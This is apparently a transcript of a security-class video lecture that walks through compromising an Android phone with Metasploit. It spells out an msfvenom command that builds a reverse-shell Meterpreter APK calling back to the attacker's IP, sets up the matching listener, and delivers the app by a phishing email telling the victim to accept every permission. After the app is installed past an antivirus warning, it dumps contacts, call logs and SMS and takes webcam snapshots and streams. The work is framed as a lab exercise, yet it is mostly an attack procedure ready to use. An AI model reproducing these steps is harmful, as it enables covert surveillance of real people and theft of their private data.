Let's pwn a mobile device with Metasploit. Now, you already set up the infrastructure and you made sure that your phone, your Android phone, could send emails back and forth between Kali and the phone. And the whole idea, the whole reason why you did this is because we need to be able to have the devices connect and send email through a wireless environment. So what we're going to do is we're going to go to Kali and we're going to start a terminal and we're going to use MSF Venom to create a re-encoded malicious package that will spawn a reverse shell back to the laptop from the Android. So we need to change the listener host to Kali IP and we're going to save it as an APK. This is all one line. So in Kali, we're going to say MSF Venom, TAC-P for payload. This is an Android interpreter, reverse TCP. lhost equals, and then put in Kali IP, lport equals whatever, 4444. Create this in raw mode to the root, and we'll call it Warcraft TAC-Mini.apk. And we'll make sure it's there, and then we'll start a handler for exploiting this and for listening when this device makes a connection. Then we're going to go ahead and send an email to the victim from Kali to the Android. And we're going to install this thing. And then we're going to switch to the Android phone and we're going to download and run the app. And then once we get there, we're going to have some fun with the phone. So coming back to MSF Venom right here, I'm going to just scoot this aside so you can see it. I'm coming to Kali. I'm going to log in, and I have my Android phone also just recording. MSF Ven. Oops, excuse me. Let's log in as password tour, and I already have emails going back and forth, so that's okay. Just minimize Thunderbird for a moment. Let's open a terminal, and let's zoom in a little bit so that you can see what's going on. Now let's create the MSF Venom package. Hope I can scoot this over so we can see okay. It's all one big long line. MSF Venom, TAC-P, that's for payload. It's an Android, if I can spell correctly, interpreter, reverse underscore TCP. The lhost is Kali's IP address, and if we're not sure, again, we can always open up another terminal just to make sure what is Kali's IP, if config, and in my case, Kali is 10.0.0.107. Your case, it's going to probably be different. So lhost equals 10.0.0.107. Can you do this across the internet? Sure you can, so long as this is a public IP, or it's the public interface of your router, and then you have something that is publishing, you have a rule in your router publishing 4444 back to your Kali. But that is beyond the scope of this class to discuss. So now, the lport, we're going to tell it to connect to 4444. So that's lport equals 4444. And as you can see here, there's no spaces here. So there's a space after the IP address in lport, but no space between lport and the number. Okay, in raw mode, so now capital R, then space greater than, put it on the root profile, and we'll call it Warcraft TAC-Mini.apk, and press enter. And it's going to create this thing, and it's going to, since we specified Android, it's going to make some assumptions that we didn't bother to put in. So it says no platform was selected, so we chose Android. Yep, that was correct. No architecture selected, so we chose Dalvik. Yes, that is correct. And it is about 10 kilobytes in size, pretty small. All right, now if we type ls, we don't have to cd into root because we were already there. If we look, there's Warcraft TAC-Mini.apk. There it is there. And if we ls-l, we can see there's Warcraft Mini APK, and it's about 10 kilobytes in size, and we're all set. Okay, so now let's start a handler before we send the email. So we need to do this in the Metasploit console. So let's start a Metasploit console here. we can either click the blue shield with the M, or we can type MSF console. Either one works. Take just a moment for this to load the console, and as soon as it's ready, we're going to start a handler, start a listener. And we're going to use the multi-handler. So I'm just going to type clear so you guys can see it a little better. Let's use exploit / multi / handler. You can actually leave off the word exploit if you wanted. Press enter. Let's set the payload. It, of course, has to agree with what the malicious payload is going to be. So it's set payload Android /meterpreter /reverse _ TCP, and there it is there. Press enter. Let's now go on. Let's set the L host. Since the Metasploit framework console is not case sensitive, and I don't need to have the equal sign. So what did we say Kali was? Let's just look at that other. I'm right clicking all windows, and I am looking for the one with if config. It's 10.0.0.107. Okay. Just minimize this so we don't see anything in the background. Set the L host 10.0.0.107 and press enter. Let's set the L port to 4444, enter, and then either we type run or exploit. They both do the exact same thing, enter. So a reverse handler is ready and waiting. Okay, so now the next thing to do, this reverse handler is basically a small program called a stub. And what's going to happen, and I talk about it here, is when the victim makes a connection back to us, it's going to forward the communication or pass the communication between the incoming connection to the next stage. And the next stage is telling the phone to download the big Meterpreter, because Meterpreter is actually a relatively big and heavy payload. So of course they have to match. And then, now that we've done that, let's go to Kali. Let's use Thunderbird to send an email to the victim with Warcraft Mini APK as an attachment. Don't try to do this using regular Gmail or Yahoo Mail or Hotmail, because they will quarantine your attachment and they'll filter that out, or they'll disallow you even to send the email or something. That's why we are using our own email server, which we have set up. So I have Thunderbird ready and running from the earlier setup activity, and I've got it going here, and here I am as Moo. And as Moo, I'm going to write something to my friend Chris. So this is to Chris at example.com. And the subject is the coolest game you never played. You can put in anything you like. Hey, I just love this game. Install it and say yes to any prompts. In other words, we're going to tell it to grant permissions it really shouldn't. And it is called main activity, which happens to be a default name for any new Android program that you build in Java. And we could change it, and we could change its icon if we had a Java development environment like Eclipse or something like that. But that's way beyond the scope of this class. So I'm sending this phishing email, and I'm going to send an attachment. So let's click the attachment here. And in root, we should be able to find Warcraft Mini. There it is right there. Assuming we made no mistakes. So there's that. Let's open. Assuming we made no mistakes, the victim is going to get this and going to download it. Now, we may have an issue in terms of allowing attachments from unknown sources, but if that pops up, we can fix that. So let's send. So it's away, and now I'm switching over to the phone, and I can see there's an email right there on the phone. Let me open up the phone. I'm tapping that, and let me just, here it is right here. So I've synchronized. There's the coolest game. Let me open that up, and let me see if I can just go get the attachment here. Now, we may run into a security thing, which we'll fix. So let me download this thing. So I'm just going to save it. There's an artifact here. Just go ahead and hit save. And it's saved to the download folder. Let me see if I can open it up and actually run this. Okay, so Trojan detected. So we're going to have to stop this for a moment. So we're going to do this. Let's clear this out. Remind me later. Let's not remove right now. So let's see if we can just do this. Let's click OK, see if this works. And now it's saying, hey, do you want to allow this to do all these things? And modify system settings. I mean, these are things that no rightful application should be doing. Take pictures and video, modify your contacts, record audio, directly call phone numbers, read your text messages, modify or delete contents of your SD card, find your location. Whatever. My friend said this is the best game ever. I'll click install. And I'm going to play this thing. App installed. And we're coming back over here. We're waiting. All right, it's saying, hey, this is a Trojan. Nope, remind me later. App installed, let's open it. I'm so eager to play the coolest game ever. I've tapped it, and it ran in the background, and I now have an interpreter prompt for the phone. Now, of course, as a user, I'll email my friend and say, what happened to the game? It's not playing. And, then Moo will email back and say, oh, I'm sorry, man. This it must be corrupt. Let me go get another copy. Or if you had the time and the knowledge, you could Trojanize a real Android app, but that's beyond the scope of what we're doing here. So this interpreter session shows that I connected from Kali to, I have a connection from Kali to this phone. So I have this connection here. And now let's do let's just type a question mark. What can you do to an Android phone? Question mark. Press enter. And there's a lot of commands. We have to scroll back to see. There's loads of commands. Interpreter has so many commands. It's beyond the scope of this class to dig deep into Metasploit, but I encourage you to play with it because it's really the tool. So we could list processes, and we could kill them, and we could read things, and we could browse around, and we could download stuff, and we could edit stuff, and we could see what directory we're in. And just for fun, we can also run Windows and Linux commands. Some of these commands might not work properly. And we could execute commands. Let's just do something simple like sysinfo here. And we'll do a sysinfo. And we'll do a get UID, who am I, and maybe local time. And then we could grab screenshots. We could record the mic and the webcam. So let's just do something really easy. Let's sysinfo. So let's press sysinfo here. Let me just make sure that the phone is still running. Okay, so the phone recording is still going. Excellent. Okay, so you can see that this is an Android 6.0, which is correct. And this is a Dalvik Android. Yep. All right, what else do we have? Ooh, could we start dumping the call log and the contacts? Now, this phone may not really have much, but you can see how it's done. Dump _ call log. Press enter. No call log entries found. Too bad. If there were entries, it would save it as a file. How about dump _ contacts? I know that there are loads of contacts on this phone, which I'm not going to open up because these are actual real contacts, and it's going to take a while. And it's saved as a text file right here. And what I do is to get to it, I'm on desktop, but to get to it, I click Files in Linux, in Kali here. And just in Home, you'll see the, where is it? The call log contacts. Here it is, contacts dump. And whichever one is the later one. So you can open that up and you can see the contacts. Okay, great. What else could we do? Could we dump SMSs? Sure, why not? Dump SMS _ SMS, press enter. No SMSs, sorry. Could we geolocate this thing? Now, without a SIM card, without a SIM in it, SIM card in it. Now, geolocate didn't work because I don't have a SIM card. Could we send an SMS? Yes, we could if this thing had a SIM card. Could we query its database? Android phones and iOS phones, iPhone phones also, they use a very tiny database called SQLite. So we could do that. Can we geolocate via the WLAN? We can try. WLAN_geolocate. See if this gets anywhere near where we are. Nah, not really. Need an API key, which we don't have. We're not going to go into that right now. Could we find out if the device is rooted? Check_root. Why not? Check_root. Device is not rooted. We did not have to root the device. All we had to do was persuade our victim that it was okay to launch this malicious attachment. And so you could have a whole bunch of fun here. Now let's really do the coup de grace here. We don't have an audio file on the target system, but we could start recording the mic. And we could start a video chat, or we could list the webcams, or we can start streaming and doing a webcam snap. Let's try to do a webcam snap right here. So webcam_snap. Webcam_snap. Now, before I do this, I'd better point the webcam at something interesting. So I don't know if it's going to have the forward webcam pointing at me or the reverse webcam. Who knows? Doesn't really matter. Let's just, whatever it is, let's just make it fun, and let's go. So this one. And it took a picture. Did you hear that little click? Oh, it was pointed at my screen, guys. Okay. And too bad it's sideways. All right. Okay, so that's a snap of the webcam. How about, can we webcam stream? This would be fun. Let's webcam stream. Now, the performance depending on your phone, may be good or it may be bad, but I'm going to give it a shot here. Webcam_stream. In fact, I'm going to highlight, right-click, and copy so I can just come down here and right-click and paste this thing. So I think it's going to point to the wrong camera. Let's find out. Enter. It should open up a like a browser in a moment so we can see. Performance is not that great when you're running virtual machines. Be a little bit better if I had a better phone, and if I had, there it is, right there. Well, you can see the unattractive green color. I'm trying to orient myself here, trying to aim this. Am I aiming at a door? There's a light switch. Okay, you guys can see that. I'm not going to show you too much of the interior here, but let me see if I can bring my hand over here and wave at you guys. See if I can. There's my hand. Hi, guys. Hi, guys. Okay, performance is not too brilliant, we can see, and I'm upside down at the moment. But you could have loads of fun by having this stream all around the room looking at different people. It's always fun in a class with a bunch of people. Okay, so you can go on and on and on. Right now we're going to break this. I'm going to Control-C. I'm going to break back to Meterpreter, and we could do a bunch of other things. I'm going to leave it to you guys to explore. Just like I said, press a question mark, press Enter, and scroll back to see the various commands you can issue. And that is how we pwn a mobile device using Metasploit.